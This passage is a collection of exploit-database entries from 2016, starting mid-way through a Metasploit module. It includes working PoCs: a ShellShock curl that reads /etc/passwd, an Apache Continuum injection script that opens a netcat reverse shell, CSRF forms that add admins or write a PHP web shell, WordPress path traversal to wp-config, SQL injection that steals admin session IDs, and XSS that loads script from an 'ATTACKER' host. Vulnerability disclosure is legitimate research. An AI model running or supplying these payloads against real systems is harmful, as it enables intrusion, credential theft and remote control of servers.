backdoor_fname: backdoor_fname,
payload_fname: payload_fname,
sid: sid,
uid: uid,
os: os
}
upload_php_backdoor(opts)
upload_payload(backdoor_fname, payload_fname)
end
# Tries to set the target. If the user manually set one, then avoid automatic target.
#
# @param os [String] OS information.
# @return [void]
def try_set_target(os)
@my_target = target if target != targets[0]
case os
when WINDOWS
@my_target = targets[1]
when LINUX
@my_target = targets[2]
else
fail_with(Failure::NoTarget, 'Unsupported target')
end
end
# Exploits the target machine. To do this, first we must log into the system in order to obtain
# the user ID and session ID. After logging in, we can ask the vulnerable code to upload a
# malicious PHP backdoor, and then finally use that backdoor to upload and execute our payload.
def exploit
res = do_login
uid = res['userid']
sid = res['sessionid']
os = get_os(sid, uid)
print_status("Detected OS information: #{os}")
try_set_target(os)
do_backdoor_sqli(os, sid, uid)
end
end
Mogwai Security Advisory MSA-2016-01
----------------------------------------------------------------------
Title: PowerFolder Remote Code Execution Vulnerability
Product: PowerFolder Server
Affected versions: 10.4.321 (Linux/Windows) (Other version might be also affected)
Impact: high
Remote: yes
Product link: https://www.powerfolder.com
Reported: 02/03/2016
by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)
Vendor's Description of the Software:
----------------------------------------------------------------------
PowerFolder is the leading on-premise solution for file synchronization
and collaboration in your organization. PowerFolder Business Suite and
PowerFolder Enterprise Suite both offer a fully integrated and secure
solution for backup, synchronization and collaboration.
Support for federated RADIUS, LDAP and RESTful APIs allow PowerFolder
to blend in perfectly into your environment while all data is stored
on your own IT infrastructure, ensuring that your data remains 100%
under your control.
Business recommendation:
-----------------------------------------------------------------------
Apply patches that are provided by the vendor. Restrict access to the
PowerFolder port, as the vulnerability might be exploited with other gadgets.
CVSS2 Ratings
-----------------------------------------------------------------------
CVSS Base Score: 9.3
Impact Subscore: 10
Exploitability Subscore: 8.6
CVSS v2 Vector (AV:N/AC:M/Au:N/C:C/I:C/A:C)
-----------------------------------------------------------------------
Vulnerability description:
----------------------------------------------------------------------
The PowerFolder server and client are written in Java. Data exchange is mainly
done via serialized objects that are send over a dedicated port (TCP port 1337).
This service allows deserialization of untrusted data, which can be exploited to
execute arbitrary code.[1][2]
The tested PowerFolder version contains a modified version of the Java
library "ApacheCommons". In this version, the PowerFolder developers removed
certain dangerous classes like
org.apache.commons.collections.functors.InvokerTransformer
however, exploitation is still possible using another gadget chain [3].
Proof of concept:
----------------------------------------------------------------------
A simple PoC can be found here:
https://github.com/h0ng10/powerfolder-exploit-poc
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39854.zip
Disclosure timeline:
----------------------------------------------------------------------
10/02/2016: Bug discovered during pentest preparation
02/03/2016: Initial contact via vendor support form
02/03/2016: Response from vendor, asking for additional details
02/03/2016: Sending description, including a very simple PoC
07/03/2016: Response from PowerFolder developers, they are unable to reproduce
the issue
07/03/2016: Response from Mogwai Security, will develop a improved PoC exploit
12/03/2016: Providing an improved exploit PoC that does not only work in LAN
networks
21/03/2016: Requesting an update from the developers
21/03/2016: Phone call with PowerFolder developers
21/03/2016: Additional response from PowerFolder, they plan to release a
security update at the end of the month
01/04/2016: Release of PowerFolder 10 SP5, including vulnerability
acknowledgement [4]
References:
----------------------------------------------------------------------
[1] https://frohoff.github.io/appseccali-marshalling-pickles/
[2] https://www.youtube.com/watch?v=VviY3O-euVQ
[3] https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections3.java
[4] https://wiki.powerfolder.com/display/PFC/PowerFolder+Client+10+SP5
Advisory URL:
----------------------------------------------------------------------
https://www.mogwaisecurity.de/#lab
----------------------------------------------------------------------
Mogwai, IT-Sicherheitsberatung Muench
Gutenbergstrasse 2
89231 Neu-Ulm (Germany)
info@mogwaisecurity.de
# Exploit Title: Valve Steam 3.42.16.13 Local Privilege Escalation
# CVE-ID: CVE-2016-5237
# Date: 5/11/52016
# Exploit Author: gsX
# Contact: gsx0r.sec@gmail.com
# Vendor Homepage: http://www.valvesoftware.com/
# Software Link: http://store.steampowered.com/about/
#Version: File Version 3.42.16.13, Built: Apr 29 2016, Steam API: v017, Steam package versions: 1461972496
# Tested on: Windows 7 Professional x64 fully updated.
1. Description:
The Steam directory located at C:\Program Files (x86)\Steam implement weak
file permissions
and allow anyone in the BUILTIN\Users windows group to modify any file in
the Steam directory and any of its child files and folders.
Since Steam is a startup application by default this makes it particularly
easy to achieve lateral/vertical privilege escalation and achieve code
execution against any user running the application.
2. Proof
C:\Program Files (x86)>icacls Steam
Steam BUILTIN\Users:(F)
BUILTIN\Users:(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(F)
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
3. Exploit:
Simply backdoor/replace Steam.exe or any other related exe's/dll's with
the code you want to
run.
I would like to note that I contacted Valve on several occasions
and gave them plenty of time to reply/fix the issue before releasing this
entry.
# Exploit Title: ShellShock On Sun Secure Global Desktop & Oracle Global desktop
# Google Dork: intitle:Install the Sun Secure Global Desktop Native Client
# Date: 6/4/2016
# Exploit Author: lastc0de@outlook.com
# Vendor Homepage: http://www.sun.com/ & http://www.oracle.com/
# Software Link: http://www.oracle.com/technetwork/server-storage/securedesktop/downloads/index.html
# Version: 4.61.915
# Tested on: Linux
VULNERABLE FILE
http://target.com//tarantella/cgi-bin/modules.cgi
POC :
localhost@~#curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://target.com/tarantella/cgi-bin/modules.cgi > xixixi.txt
localhost@~#cat xixixi.txt
which will print out the content of /etc/passwd file.
# Exploit Title: Unauthenticated command injection - Apache Continuum
# Google Dork: inurl::8080/continuum/
# Date: 04/06/2016
# Exploit Author: David Shanahan (@cyberpunksec)
# Contact: http://www.procheckup.com/
# Vendor Homepage: https://continuum.apache.org/
# Software Link: https://continuum.apache.org/download.cgi
# Version: 1.4.2
# Tested on: Debian
--- Description ---
Apache Continuum is a continuous integration server for building Java projects https://continuum.apache.org/
ProCheckUp has discovered that Apache Continuum is vulnerable to an unauthenticated command injection attack and reflected XSS.
1) Command injection
Vulnerable URL - http://127.0.0.1:8080/continuum/saveInstallation.action
Vulnerable Parameter - installation.varValue
#!/bin/sh
if [ $# -eq 0 ]
then
echo "$0 <rhost> <rport> <lhost> <lport>"
echo "Remember to set up your netcat listener"
exit 1
fi
cmd="\`nc $3 $4 -e /bin/sh\`"
echo "\n\t[ Apache Continuum <= v1.4.2 CMD Injection ]"
echo "\t\t[ Procheckup - David Shanahan ]\n"
curl http://$1:$2/continuum/saveInstallation.action --data "installation.name=blah&installation.type=jdk&installation.varValue=$cmd"
2) Reflected XSS
The cross site scripting attack works against authenticated users only. An example attack would be to send an authenticated user (let's say the admin) the malicious URL.
If the victim is logged in and accesses the URL, the attacker could steal the victim's session cookie and impersonate them.
Vulnerable URL - http://127.0.0.1:8080/continuum/security/useredit_confirmAdminPassword.action?userAdminPassword=&username=guest&user.username=guest<script>alert(document.cookie)</script>&user.fullName=Guest&user.email=blah@procheckup.com&user.password=password&user.confirmPassword=password&user.timestampAccountCreation=&user.timestampLastLogin=&user.timestampLastPasswordChange=&user.locked=false&user.passwordChangeRequired=false&method:confirmAdminPassword=Submit&cancel=Cancel<http://127.0.0.1:8080/continuum/security/useredit_confirmAdminPassword.action?userAdminPassword=&username=guest&user.username=guest%3cscript%3ealert(document.cookie)%3c/script%3e&user.fullName=Guest&user.email=blah@procheckup.com&user.password=password&user.confirmPassword=password&user.timestampAccountCreation=&user.timestampLastLogin=&user.timestampLastPasswordChange=&user.locked=false&user.passwordChangeRequired=false&method:confirmAdminPassword=Submit&cancel=Cancel>
Fix:
The Apache Continuum project is no longer maintained. Removal of the software is recommended.
http://www.procheckup.com/
<!--
# Exploit Title: Dream Gallery - CSRF Add Admin Exploit
# Google Dork: "Design by Rafael Clares"
# Date: 2016/06/03
# Exploit Author: Ali Ghanbari
# Vendor Homepage: http://phpstaff.com.br/
# Version: 1.0
#Exploit:
-->
<html>
<body>
<form method="post" action="http://localhost/{PACH}/admin/usuario.php?action=incluir">
<input type="hidden" name="user_login" value="ali">
<input type="hidden" name="user_password" type="hidden" value="123456" >
<input type="hidden" name="user_email" value="">
<input type="submit" value="create">
</form>
</body>
</html>
<!--
#########################
[+]Exploit by: Ali Ghanbari
[+]My Telegram :@Exploiter007
-->
Advisory: Websockify: Remote Code Execution via Buffer Overflow
RedTeam Pentesting discovered a buffer overflow vulnerability in the C
implementation of Websockify, which allows attackers to execute
arbitrary code.
Details
=======
Product: Websockify C implementation
Affected Versions: all versions <= 0.8.0
Fixed Versions: versions since commit 192ec6f (2016-04-22) [0]
Vulnerability Type: Buffer Overflow
Security Risk: high
Vendor URL: https://github.com/kanaka/websockify
Vendor Status: fixed
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-004
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
Introduction
============
"websockify was formerly named wsproxy and was part of the noVNC
project.
At the most basic level, websockify just translates WebSockets traffic
to normal TCP socket traffic. Websockify accepts the WebSockets
handshake, parses it, and then begins forwarding traffic between the
client and the target in both directions."
(from the project's readme)
More Details
============
For each new connection, websockify forks and calls the function
do_handshake() to receive a client's WebSocket handshake. The
following excerpt shows some of the source code responsible for
receiving the client's data from the socket file descriptor:
------------------------------------------------------------------------
ws_ctx_t *do_handshake(int sock) {
char handshake[4096], response[4096], sha1[29], trailer[17];
[...]
offset = 0;
for (i = 0; i < 10; i++) {
len = ws_recv(ws_ctx, handshake+offset, 4096);
if (len == 0) {
handler_emsg("Client closed during handshake\n");
return NULL;
}
offset += len;
handshake[offset] = 0;
if (strstr(handshake, "\r\n\r\n")) {
break;
}
usleep(10);
}
[...]
------------------------------------------------------------------------
As can be seen in the listing, the function ws_recv() is called in a
loop to read data from the client's socket into the stack-allocated
buffer 'handshake'. Each time ws_recv() is called, a maximum of 4096
bytes are read from the socket and stored in the handshake buffer.
The variable 'offset' determines the position in the buffer at which
the received data is written. In each iteration, the value of 'offset'
is increased by the amount of bytes received. If the received data
contains the string "\r\n\r\n", which marks the end of the WebSocket
handshake data, the loop is terminated. Otherwise, the loop is
terminated after a maximum of 10 iterations. The do_handshake()
function returns early if no more data can be received from the
socket.
By forcing websockify to iterate multiple times, attackers can
exploit this behaviour to write data past the space allocated for the
handshake buffer, thereby corrupting adjacent memory.
Proof of Concept
================
The following curl command can be used to trigger the buffer overflow:
$ curl http://example.com/$(python -c 'print "A"*5000')
Providing a generic exploit for this vulnerability is not feasible, as
it depends on the server side environment websockify is used in as well
as the used compiler and its flags. However, during a penetration test
it was possible to successfully exploit this buffer overflow
vulnerability and to execute arbitrary commands on the server.
Workaround
==========
Use the Python implementation of websockify.
Fix
===
The vulnerability has been fixed in commit 192ec6f [0].
Security Risk
=============
Successful exploitation of the vulnerability allows attackers to execute
arbitrary code on the affected system. It is therefore rated as a high
risk.
Timeline
========
2016-04-14 Vulnerability identified
2016-05-03 Advisory provided to customer
2016-05-06 Customer provided updated firmware, notified users
2016-05-23 Customer notified users again
2016-05-31 Advisory published
References
==========
[0] https://github.com/kanaka/websockify/commit/192ec6f5f9bf9c80a089ca020d05ad4bd9e7bcd9
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
####################
# Meta information #
####################
# Exploit Title: Wordpress plugin simple-backup - Multiple vulnerabilities
# Date: 2016-06-02
# Exploit Author: PizzaHatHacker [A] gmail [.] com
# Vendor Homepage: [DEAD LINK] https://wordpress.org/plugins/simple-backup/
# Software Link: [DEAD LINK] https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip
# Version: 2.7.11
# Tested on: simple-backup 2.7.11 & Wordpress 4.4.2
#
# History :
# 2016-02-21 Contact requested on the vendor website via "Contact Us"
# 2016-02-24 Contact requested on the vendor website via "Support"
# 2016-03-09 Email to plugins@wordpress.org
# 2016-03-10 Acknowledged by Wordpress team
# 2016-06-02 No information, no response, vulnerabilities not fixed,
# disclosure of this document.
#
##################################
### 1. Arbitrary File Deletion ###
##################################
It is possible to remotely delete arbitrary files on the webserver on wordpress
blogs that have simple-backup plugin installed and enabled. No authentication
is required, the default configuration of simple-backup is affected.
Example 1 : Delete "pizza.txt" in wordpress root :
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&delete_backup_file=../pizza.txt
Example 2 : Delete .htaccess file protecting the backup folder :
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&delete_backup_file=.htaccess&download_backup_file=inexisting
Note : When 'download_backup_file' parameter is provided with an invalid
filepath, the PHP script exits prematurely with message "Access Denied!" and so
does not regenerate automaticaly the .htaccess file.
After this request, it may be possible (depending on the web server
configuration) to browse the backup directory and download server backup files
at this URL :
http://127.0.0.1/<WP-path>/simple-backup/
The backup archive files may contain all the wordpress files : configuration
files (wp-config.php etc.), PHP source code (plugins, etc.), and a database
dump (all tables content, wordpress users passwords etc.).
CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVSS Base Score : 7.5
Impact Subscore : 6.4
Exploitability Subscore : 10
########################
### 2. File Download ###
########################
It is possible to download remote files from the webserver on wordpress blogs
that have simple-backup plugin installed and enabled. No authentication is
required, the default configuration of simple-backup is affected.
Example 1 : Download tools.php source file :
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&download_backup_file=
Example 2 : Download a backup file :
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&download_backup_file=backup-2016-02-21-111047.tar
(If backups are performed automatically at predefined times, it is easy to
find the backup file name, as it is based on the current time).
Moreover, the checks performed on user-provided 'filename' parameter are
insufficient :
simple-backup-manager.php:function download_local_backup_file($filename){
$filename = ltrim($filename, ".\/");
* Only logged-in AND authorized users (with permissions to manage backups)
should be allowed to download files
* The file name should match a backup file and must not be empty
* The input is not correctly checked for directory traversal (use PHP
'basename' instead of 'ltrim')
For example in the special case where a folder 'oldBackups' is created inside
the backup directory, it would be possible to download ANY file on the web
server via direct requests to this kind of URLs :
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&download_backup_file=oldBackups/../../wp-config.php
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&download_backup_file=oldBackups/../../../../../../etc/passwd
CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CVSS Base Score : 5
Impact Subscore : 2.9
Exploitability Subscore : 10
Advisory: Unauthenticated File Upload in Relay Ajax Directory Manager
may Lead to Remote Command Execution
A vulnerability within the Relay Ajax Directory Manager web application
allows unauthenticated attackers to upload arbitrary files to the web
server running the web application.
Details
=======
Product: Relay Ajax Directory Manager
Affected Versions: relayb01-071706, 1.5.1, 1.5.3 were tested, other
versions most likely vulnerable as well.
Fixed Versions: -
Vulnerability Type: Unauthenticated File Upload
Security Risk: high
Vendor URL: https://github.com/HadoDokis/Relay-Ajax-Directory-Manager
Vendor Status: decided not to fix, project is unmaintained
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-005
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
Introduction
============
Relay Ajax Directory Manager[1], also known as relay[2], is a web-based
file manager. It allows files and folders to be uploaded via drag and
drop and provides several other features, such as a thumbnail preview
for images and basic user authentication functionality.
More Details
============
While the web application itself is mostly written in PHP, it also
utilizes the Perl script 'upload.pl' for handling uploads initiated by
the user.
Uploading is a multi-step process:
1. The user initiates a multipart/form-data upload request through the
web application. This request is sent to the Perl script and the
following steps are handled by it.
2. A temporary file containing the entire request (including
headers) is created. This temporary file is named partly by the first
URL parameter, as shown in the following listing.
3. The headers and the POST body of the request are parsed and filtered
to determine the final filename.
4. The upload is written to the final destination.
5. A file containing statistics about the upload process is written
During steps 2-5, no checks are performed to ensure that the user is
sufficiently authenticated.
The following listing shows parts of the upload Perl script:
-- upload.pl -----------------------------------------------------------
[...]
@qstring=split(/&/,$ENV{'QUERY_STRING'});
$sessionid = $qstring[0];
[...]
$tmpfile = "$uploadsFolder\\temp_$sessionid";
$statsfile = "$uploadsFolder\\stats_$sessionid.txt";
$tmpfilepre= "$uploadsFolder\\$sessionid\_";
[...]
open(FILE,">","$tmpfilepre$filename") or print "can't open temp file";
binmode(FILE);
print FILE $filedata;
close FILE;
[...]
------------------------------------------------------------------------
Here, the first URL parameter is stored in the variable $sessionid. The
content of this variable is then used as a prefix for the filename for
the uploaded data before it ultimately gets written. Given the
configured upload directory, which is 'uploads/' by default, the URL of
the uploaded file can be determined.
The web application usually requires users to be authenticated before
any actions (e.g. uploading) can be performed, but since the Perl script
is not secured by any form of authentication, it can be accessed by
anyone. If the web server does not prohibit the execution of e.g. PHP
files within the upload directory, arbitrary PHP commands can be
executed by uploading the respective files to the web server.
Proof of Concept
================
In general, the Perl script expects a request containing
multipart/form-data. In this case, the name specified in the 'filename'
field is prepended with the first URL parameter. Using the command line
HTTP client curl, a request like the following can be made to a
vulnerable installation of Relay Ajax Directory Manager in order to
upload a PHP script which invokes the function 'phpinfo()':
curl -i -s -k -X 'POST' \
-H 'Content-Type: multipart/form-data; boundary=----------------------------83ff53821b7c' \
--data-binary $'------------------------------83ff53821b7c\x0d\x0a'\
$'Content-Disposition: form-data; filename=\"info.php\"\x0d\x0a'\
$'Content-Type: application/octet-stream\x0d\x0a\x0d\x0a'\
$'<?php phpinfo(); ?>\x0d\x0a'\
$'------------------------------83ff53821b7c--' \
'http://example.com/relay-1-5-3/upload.pl?redteam'
The server responds with HTTP status code 200 indicating a successful
upload:
HTTP/1.1 200 OK
Date: Mon, 09 May 2016 11:09:50 GMT
Server: Apache/2.4.18 (Debian)
Content-Length: 0
Content-Type: text/plain
Such a request would yield the following files in the web server's
upload directory upon success:
$ ls relay-1-5-3/uploads/
redteam_info.php stats_redteam.txt temp_redteam
The file redteam_info.php contains the multipart/form-data that was
sent to the upload.pl script:
$ cat relay-1-5-3/uploads/temp_redteam.php
<?php phpinfo(); ?>
Requesting this file with the URL
http://example.com/relay-1-5-3/uploads/redteam_info.php will then yield
the server's output of the phpinfo() function.
However, since the entire content of the upload request is saved to a
temporary file, a regular POST request containing only the code to be
executed is sufficient to exploit this vulnerability. The following
invocation of curl uploads the same PHP script which invokes the
function 'phpinfo()':
$ curl --silent --include --data '<?php phpinfo(); ?>' \
'http://example.com/relay-1-5-3/upload.pl?redteam.php'
In the server's upload directory, the file temp_redteam.php contains
the data that was sent to the upload.pl script:
$ ls relay-1-5-3/uploads/
stats_redteam.php.txt temp_redteam.php
$ cat temp_redteam.php
<?php phpinfo(); ?>
Requesting this file with the URL
http://example.com/relay-1-5-3/uploads/temp_redteam.php will again yield
the server's output of the phpinfo() function.
Using either of these methods, an attacker is able to upload arbitrary
files to the affected web server e.g. in order to easily execute PHP
commands with the privileges of the web server.
Workaround
==========
One possible workaround would be to prevent the execution of files in
the upload directory and deliver them as attachments instead.
Fix
===
None.
Security Risk
=============
This vulnerability allows unauthenticated attackers to upload arbitrary
files to the affected system. In the web server's and project's default
configuration it is very likely that this may be used to execute
arbitrary commands with the privileges of the web server process. This
is possible without authentication, thereby providing no barrier for
attackers. It is therefore rated as a high risk. Since this software is
quite old and not well maintained, it is likely that additional
vulnerabilities exist. However, this was not further evaluated.
Timeline
========
2015-11-19 Vulnerability discovered
2016-04-07 Customer approved disclosure of vulnerability
2016-05-12 Developers contacted, project is no longer maintained
2016-05-31 Advisory published
References
==========
[1] https://github.com/HadoDokis/Relay-Ajax-Directory-Manager
[2] https://code.google.com/p/relay/
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
CVE-2016-3670 Stored Cross Site Scripting in Liferay CE
1. Vulnerability Properties
Title: Stored Cross-Site Scripting Liferay CE
CVE ID: CVE-2016-3670
CVSSv3 Base Score: 4.6 (AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N)
Vendor: Liferay Inc
Products: Liferay
Advisory Release Date: 27 May 2016
Advisory URL: https://labs.integrity.pt/advisories/cve-2016-3670
Credits: Discovery by Fernando Câmara <fbc[at]integrity.pt>
2. Vulnerability Summary
Liferay is vulnerable to a stored XSS when an user is created with an
malicious payload on the FirstName field.
The javascript payload is executed when another user tries to use the
profile search section.
3. Technical Details
An XSS vulnerability was found on the Profile Search functionality,
accessible through User -> My Profile -> Search. An attacker can set a
malicious javascript payload on his First Name affecting anyone who
performs a search using a keyword present on his profile.
The exploitation of this vulnerability could lead to an effective way to
grab cookies (stealing sessions) from anyone that uses that search
component.
Exploitation Request: (User Registration with an malicious FirstName field)
POST /liferay/web/guest/home?p_p_id=58&p_p_lifecycle=1&p_p_state=
maximized&p_p_mode=view&_58_struts_action=%2Flogin%2Fcreate_account
Data:
_58_firstName=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2
The vulnerability is located on the users.jsp and as shown below the origin
is the lack of validation of user input:
line 64: <a data-value=”<%= curUserName %>” href=”javascript:;”>
4. Vulnerable Versions
< 6.2 CE GA6
5. Solution
Update to version 7.0.0 CE RC1
6. Vulnerability Timeline
21/Jan/16 - Bug reported to Liferay
22/Mar/16 – Bug verified by vendor
22/Mar/16 – Bug fixed by vendor
27/May/16 – Advisory released
7. References
https://issues.liferay.com/browse/LPS-62387
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3670
Information
------------------------------
Advisory by ADEO Security Team
Name: Stored XSS and SQL Injection in Joomla SecurityCheck extension
Affected Software : SecurityCheck and SecurityCheck Pro
Vulnerable Versions: 2.8.9 (possibly below)
Vendor Homepage : https://securitycheck.protegetuordenador.com
Vulnerabilities Type : XSS and SQL Injection
Severity : High
Status : Fixed
Technical Details
------------------------------
PoC URLs for SQL Injection
For determining database, user and version.
http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(database())))))='1
http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(user())))))='1
http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(version())))))='1
For steal admin's session ID (If admin is not online, page response with
attack detected string. If online, response with admin's session ID)
http://website/index.php?option='or(ExtractValue(rand(),concat(0x3a,(SELECT
concat(session_id) FROM %23__user_usergroup_map INNER JOIN %23__users ON
%23__user_usergroup_map.user_id=%23__users.id INNER JOIN %23__session ON %
23__users.id=%23__session.userid WHERE group_id=8 LIMIT 0,1))))='1
PoC URLs for XSS
Add a new admin to website silently while admin checking SecurityCheck logs
http://website/index.php?option=<script>var script =
document.createElement('script');script.src = "http://ATTACKER/attack.js
";document.getElementsByTagName('head')[0].appendChild(script);</script>
attack.js
https://gist.github.com/MuhammetDilmac/c680cc921143543561bfdfd7b25da1ca
Disclosure Timeline
------------------------------
24/05/2016 SQL injection found
30/05/2016 Worked on one-shot exploit for SQLi
30/05/2016 While we were working on SQLi payload we also found XSS
31/05/2016 XSS payload prepared
31/05/2016 Vulnerability details and PoC sent to Protegetuordenador
31/05/2016 Vulnerabilities fixed in v2.8.10
Solution
------------------------------
Update to the latest version of SecurityCheck (2.8.10)
Credits
------------------------------
These issues have been discovered by Gokmen Guresci (gokmenguresci.com) and
Muhammet Dilmac (muhammetdilmac.com.tr).
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=803
The following SIGSEGV crash due to an invalid memory read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==28415==ERROR: AddressSanitizer: SEGV on unknown address 0x61b000022d84 (pc 0x7f0e1b0002a2 bp 0x7ffde25a76f0 sp 0x7ffde25a7630 T0)
#0 0x7f0e1b0002a1 in erf_meta_read_tag wireshark/wiretap/erf.c:1242:13
#1 0x7f0e1afff0f0 in populate_summary_info wireshark/wiretap/erf.c:1851:27
#2 0x7f0e1aff34d6 in erf_read wireshark/wiretap/erf.c:447:7
#3 0x7f0e1b1a746b in wtap_read wireshark/wiretap/wtap.c:1245:7
#4 0x528196 in load_cap_file wireshark/tshark.c:3478:12
#5 0x51e67c in main wireshark/tshark.c:2192:13
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV wireshark/wiretap/erf.c:1242:13 in erf_meta_read_tag
==28415==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12352. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39877.zip
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AJAXEXPLORER-REMOTE-CMD-EXECUTION.txt
[+] ISR: apparitionsec
Vendor:
==========
sourceforge.net
smsid
download linx:
sourceforge.net/projects/ajax-explorer/files/
Product:
=======================
AjaxExplorer v1.10.3.2
Manage server files through simple windows like interface.
Vulnerability Type:
=======================
Remote Command Execution
CSRF
Persistent XSS
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
AjaxExplorer has command terminal feature where you can move, copy, delete
files etc... also lets a user save commands in a
flat file named "terminal" under their user profile
"/ae.user/owner/myprofile".
e.g.
copy [FILEPATH + FILENAME] [FILEPATH]
create [FILEPATH + FILENAME]
Since AjaxExplorer also suffers from CSRF vulnerability we can exploit the
application by first creating an .htaccess file with an
"allow from all" directive to bypass access restrictions, next create
arbitrary PHP files for remote command execution purposes.
This exploit will require two consecutive HTTP requests, so we need to
target an iframe to stay on same page until exploit is completed.
Exploit code(s):
===============
1) first POST request creates .htaccess file so we can bypass directory
browsing restrictions.
2) second POST writes our remote command execution file we will then access
to execute commands on the victim system.
The below P:/ for "strPath" form value is for "Profile"
<iframe name="PWNED" style="display:none" name="hidden-form"></iframe>
<form target="PWNED" id="htaccess" action="
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php"
method="post">
<input type="hidden" name="strPage" value="control/file/editor" >
<input type="hidden" name="strPath" value="P:/" >
<input type="hidden" name="strFile" value=".htaccess" >
<input type="hidden" name="strText" value='allow from all' >
<script>document.getElementById('htaccess').submit()</script>
</form>
<form target="PWNED" id="RCE" action="
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php"
method="post">
<input type="hidden" name="strPage" value="control/file/editor" >
<input type="hidden" name="strPath" value="P:/" >
<input type="hidden" name="strFile" value="terminal.php" >
<input type="hidden" name="strText" value='<?php exec($_GET["cmd"]);?>' >
<script>document.getElementById('RCE').submit()</script>
</form>
Now we can access and run arbitrary cmds.
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/ae.user/owner/myprofile/terminal.php?cmd=c
:\\Windows\\system32\\calc.exe
/////////////////////////////////////////////////////
Here is another way to RCE this application... first create PHP file then
edit.
<iframe name="DOOM" style="display:none" name="hidden-form"></iframe>
<form target="DOOM" id="CSRF2" method="post" action="
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php">
<input type="hidden" name="strPage" value="control/file/editor" />
<input type="hidden" name="strPath" value="D:/" />
<input type="hidden" name="strFile" value="PWNED.php" />
<input type="hidden" name="strText"
value="<?php%20exec($_GET['cmd']);%20?>" />
</form>
<form target="DOOM" id="CSRF1" method="post" action="
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php">
<input type="hidden" name="strPage" value="control/file/create" />
<input type="hidden" name="strPath" value="D:/" />
<input type="hidden" name="strFile" value="D:/PWNED.php" />
<script>
document.getElementById('CSRF1').submit()
document.getElementById('CSRF2').submit()
</script>
</form>
////////////////////////
Persistent XSS:
================
We can also write persistent XSS payload to the user profile "terminal"
file.
<form id="XSS" method="post" action="
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php">
<input type="hidden" name="strPage" value="control/file/editor" />
<input type="hidden" name="strPath" value="P:/" />
<input type="hidden" name="strFile" value="terminal" />
<input type="hidden" name="strText" value="<script>alert(666)</script>" />
<script>document.getElementById('XSS').submit()</script>
</form>
Disclosure Timeline:
===============================
Vendor Notification: NA
June 1, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
8.0 (High)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
